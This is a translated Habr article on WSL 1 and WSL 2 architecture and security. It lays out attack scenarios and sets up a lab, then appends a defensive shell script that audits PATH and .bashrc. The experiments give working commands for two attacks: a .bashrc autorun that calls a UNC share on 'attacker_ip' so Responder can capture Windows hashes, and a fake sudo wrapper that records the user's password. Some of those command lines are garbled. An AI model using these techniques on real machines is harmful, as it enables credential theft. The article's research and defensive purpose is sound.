WSL experiments. Part 1

Hello, Habr! In October OTUS is launching a new stream of the "Linux Security" course. Ahead of the course start, we are sharing an article written by one of our instructors, Alexander Kolesnikov.

In 2016, Microsoft introduced the IT community to a new technology, WSL (Windows Subsystem for Linux), which promised to bring together the operating systems of ordinary and advanced users alike: Windows and Linux. This technology made it possible to use Linux tools in a Windows environment without having to boot Linux, for example via multi-boot. On Habr you can find plenty of articles describing the benefits of using WSL. Unfortunately, at the time of writing, no studies of the security of this kind of operating-system symbiosis could be found on this resource. This post is an attempt to fix that. The article covers the architectural features of WSL 1 and WSL 2 and examines several examples of attacks on systems that use these technologies. The article is split into two parts. The first presents the main theoretical attack methods from Linux and Windows. The second will cover setting up a test environment and reproducing the attacks.

WSL 1: architectural features

To dig into WSL security issues properly, we first need to identify the main nuances of how the subsystem is implemented. One of the main user tasks WSL solves is the ability to work in a Linux terminal on a host running Windows. In addition, the compatibility offered was native enough that Linux executables (ELF) could be run directly on a Windows system. To meet these requirements, a special subsystem was created in Windows 10 that allows Linux applications to run using a specific set of system calls; in other words, an attempt was made to map the set of Linux syscalls onto Windows. Physically, this was implemented by adding new drivers and a new process format. Visually, the architecture looked like this:

In effect, interaction with the Linux operating system was organized through several kernel modules and a special kind of process, pico. From the diagram above you can see that a process running in a Linux instance on the host must be native and must use the same resources as ordinary Windows applications. But how can this be achieved? In the Drawbridge project, process concepts for Windows were developed that provide all the operating-system components needed (depending on its version) to run an application from another OS.

Note that the proposed abstraction made it possible not to focus on the operating system (Windows in particular) in which a process of another OS is expected to run, and offered a general approach.

Thus, any application inside a pico process could run without regard to the Windows kernel:

  1. Compatibility and system-call translation problems must be solved by special providers;
  2. Access control must be carried out through the Security Monitor. The monitor lives in the kernel, so Windows needed an upgrade in the form of a new driver that could act as a provider for such processes. A prototype pico process is shown schematically below:

Since the Linux file system uses case-sensitive file and directory names, two types of file systems were added to Windows for working with WSL: VolFS and DriveFS. VolFS is an implementation of the Linux file system; DriveFS is a file system that works according to Windows rules but can optionally enable case sensitivity.

WSL 2

WSL 1 had a number of limitations that prevented it from being used for the widest range of tasks: for example, it could not run 32-bit Linux applications, and device drivers could not be used. Therefore, in 2020, WSL 2 was released, which changed the approach to building the subsystem. WSL 2 is an optimized virtual machine that matches the resource-consumption characteristics of WSL 1. Now, depending on the problems a Windows user is solving, they can choose the required version of the Linux subsystem. To mitigate possible vulnerabilities, WSL 2 was implemented on top of Hyper-V in Windows 10. In this form, Windows can run the Linux kernel in isolation. It is worth remembering that version 1 of WSL was introduced as a beta feature meant to show the direction of Windows development in this area, so the move to Hyper-V was inevitable. The final architecture looks like this:

In this version, the Windows and Linux kernels have their own resources and the intersection exists only in the file system, but this intersection is not complete. Interaction between the file systems is carried out through a client-server wrapper that works over the 9P protocol.

Today Microsoft provides the ability to switch between WSL 1 and WSL 2. Both versions are available for use.

WSL security

At the moment there are several works that describe ways of using legitimate OS tools to attack the communication between the subsystems. We will use their scenarios to check whether the attacks are still relevant at the time of writing. General list of attacks and scenarios:

1. File system implementation: access rights, presence of shared directories / data exchange mechanisms.

Research was carried out to identify violations of access rules from Linux FS -> Windows FS and Windows FS -> Linux FS. The research demonstrated the ability to modify a given file within the target OS. Attempts were also made to substitute, create duplicates of, and delete parts of the file systems.

Scenarios:

  • A. Attack from the Windows operating system: modification of files in the /etc directory of the Linux OS.
  • B. Attack from the Linux operating system: modification of files in the directories C:\Windows, C:\Program Files, C:\Users\<User>

2. Network stack implementation.

The research was carried out using examples of attacks from the Linux operating system on Windows. Features of the network stack were used, namely the authentication mechanisms on various resources.

Scenarios:

  • Opening access to a port that is in use on the Windows system
  • Opening a port without the appropriate rights
  • Running a reverse shell using an ELF file on the Windows operating system.

3. Hiding the launch of malicious software processes using the WSL subsystem.

The research was based on a simple fact: in the case of WSL 1, security subsystems cannot intercept events in another kernel that works through a legitimate provider from the operating system. In the case of WSL 2, there is no way to view events that occur in a separate kernel inside a lightweight virtual machine.

Scenarios:

1) Launching an application for remote access to the system and viewing the logged events.

WSL 1 experiment: interception (Windows)

Finally we get to the practical part. First, the test environment needs to be set up. All experiments will be carried out on a bench with Windows 10 2004 installed. The Ubuntu 18.04 image was chosen as the operating-system image for WSL. The image was chosen at random, and any other would work the same way. Commands for setting up the bench:

First you need to launch powershell.exe as administrator.

For WSL 1 you need to run the commands:

  1. Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Windows-Subsystem-Linux #Enable the WSL feature
  2. Invoke-WebRequest -Uri aka.ms/wsl-ubuntu-1804 -OutFile ~/Ubuntu.appx -UseBasicParsing #Download the Linux image from the Microsoft Store
  3. Ubuntu.appx install --root #Install the image
  4. You may need to click through the setup process and create a new user with fewer rights than root. For our tests this will be an ordinary user, sam.
  5. Restart-Computer #Reboot
  6. After the bench restarts, you can run the bash command. If everything worked correctly, you will see output similar to this in the Windows console:

We will use the Kali Linux distribution as the attacker's machine; all machines must be on the same local network.

Let us assume that we have unprivileged access to WSL on the Windows machine. Let's try to attack the Linux operating system by calling a command from Linux. To carry out the attack we will use a simple autorun technique: we will add our script for execution in the Linux environment. To do this, the .bashrc file needs to be changed.

On the machine with WSL we run:

    	1. bash
    	2. Go to the user's home directory: cd /home/sam/
    	3. echo  «/home/sam/.attack.sh» >> .bashrc
    	4. echo «icalcs.exe » \\\\attacker_ip\\shareName\\» > /dev/null 2>&1» >> .attack.sh
    	5. chmod u+x .attack.sh
    	6. exit

On the Kali Linux machine we run:

    1. Responder -I eth0 -rdvw

On the Windows machine, launch bash.

We wait for the result on the Kali Linux machine:

Thus, we obtained the Windows user's hashes through the WSL subsystem by executing a command on the Linux system.

WSL 1 experiment: obtaining the user's password (Linux OS)

Let's run one more experiment. In this test we will add several commands to the .bashrc file in order to obtain the password of the Linux operating system user.

Launch bash and enter the commands:

    1. mkdir .hidden
    2. echo "export PATH=$HOME/.hidden/:$PATH:" >> .bashrc
    3. echo "read -sp "[sudo] password for $USER: " sudopass" > .hidden/sudo
    4. echo "echo """ >> .mysudo/sudo
    5. echo "sleep 2" >> .mysudo/sudo
    6. echo "echo "Sorry, try again."" >> .mysudo/sudo
    7. echo "echo $sudopass >> /home/sam/.mysudo/pass.txt» >> .mysudo/sudo
    8. echo "/usr/bin/sudo $@" >> .mysudo/sudo
    9. chmod +x .mysudo/sudo
    10. exit

For the attack to succeed, the user sam needs to call sudo in the Linux terminal. After that, the Linux OS user's password will be in the file pass.txt:

The attack implementations are given for informational purposes only.
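
A defender-side check for the two changes made in the experiments above: the extra line in .bashrc and the sudo wrapper placed ahead of the real one in PATH. This is an added example, not code from the article; the function names and output format are assumptions, and it goes slightly beyond the text by also flagging empty PATH elements, which the shell treats as the current directory.

```shell
# Added example (not from the article): audit a WSL Linux account for the
# PATH and startup-file changes described above. Arguments are assumptions.

# find_shadowed HOME_DIR PATH_VALUE
# Prints "shadowing:shadowed" for each executable in a PATH directory under
# HOME_DIR that hides a same-named command in a later PATH directory.
find_shadowed() {
    home=${1%/}; path=$2
    # An empty PATH element (e.g. a trailing ':') means the current directory.
    case ":$path:" in
        *::*) echo "empty-element:current directory is searched" ;;
    esac
    old_ifs=$IFS; IFS=:
    set -f; set -- $path; set +f      # split PATH on ':' without globbing
    IFS=$old_ifs
    while [ $# -gt 1 ]; do
        dir=${1%/}; shift             # "$@" now holds the later directories
        case "$dir/" in
            "$home"/*) ;;             # only directories under the home dir
            *) continue ;;
        esac
        for f in "$dir"/* "$dir"/.[!.]*; do
            if [ -f "$f" ] && [ -x "$f" ]; then
                name=${f##*/}
                for later in "$@"; do
                    cand=${later%/}/$name
                    if [ -f "$cand" ] && [ -x "$cand" ]; then
                        echo "$f:$cand"
                        break
                    fi
                done
            fi
        done
    done
    return 0
}

# audit_rc FILE...
# Prints "file:line:text" for lines that start PATH with a home directory or
# that run a hidden file under a home directory.
audit_rc() {
    for rc in "$@"; do
        [ -f "$rc" ] || continue
        grep -nE 'PATH=.?(\$HOME|~|/home/)|^[[:space:]]*.?(\$HOME|~|/home/[^/]+)/\.' \
            "$rc" /dev/null || :
    done
    return 0
}
```

Inside the distribution, run `find_shadowed "$HOME" "$PATH"` and `audit_rc ~/.bashrc ~/.profile`. Legitimate entries such as $HOME/.local/bin also appear in the audit_rc output and need manual review.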

The next part of the article will describe the implementation of the 9P protocol, look at building a scanner for this protocol, and carry out an attack using it.


    source: www.habr.com
